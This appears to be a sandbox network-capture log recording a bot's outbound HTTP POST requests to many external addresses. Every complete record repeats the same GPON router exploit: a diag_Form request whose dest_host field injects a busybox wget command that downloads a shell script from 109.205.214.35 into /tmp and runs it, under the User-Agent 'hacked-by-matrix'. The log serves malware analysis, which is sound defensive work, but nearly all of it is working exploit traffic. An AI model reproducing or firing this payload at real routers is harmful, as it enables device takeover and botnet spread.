                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22192.168.2.1337238118.31.15.159443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431634903 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23192.168.2.1339574109.100.32.206443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431648016 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24192.168.2.134326242.148.57.162443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431668043 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25192.168.2.13396365.226.245.18443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431711912 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26192.168.2.1342432109.63.186.196443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431736946 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27192.168.2.1335296109.120.92.161443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431751013 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28192.168.2.1360282118.60.191.180443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431780100 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29192.168.2.1349056109.97.132.97443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431813955 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30192.168.2.13521385.141.99.130443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431858063 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31192.168.2.1335520118.130.26.113443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431874990 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32192.168.2.1346990109.43.93.254443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431901932 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33192.168.2.1354654212.81.77.219443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431935072 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34192.168.2.1335730212.44.62.12443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431962967 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35192.168.2.13450645.179.254.228443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431971073 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36192.168.2.1358888109.179.215.139443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.431993008 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37192.168.2.1338144118.93.127.1443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432029009 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        38192.168.2.13427145.54.198.44443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432081938 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        39192.168.2.1360732118.69.81.29443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432090044 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        40192.168.2.1347524212.2.238.230443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432125092 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        41192.168.2.1335458118.193.175.135443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432193041 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        42192.168.2.1354006109.100.194.221443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432223082 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        43192.168.2.13487765.212.10.14443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432241917 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        44192.168.2.1360316118.188.170.246443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.432297945 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
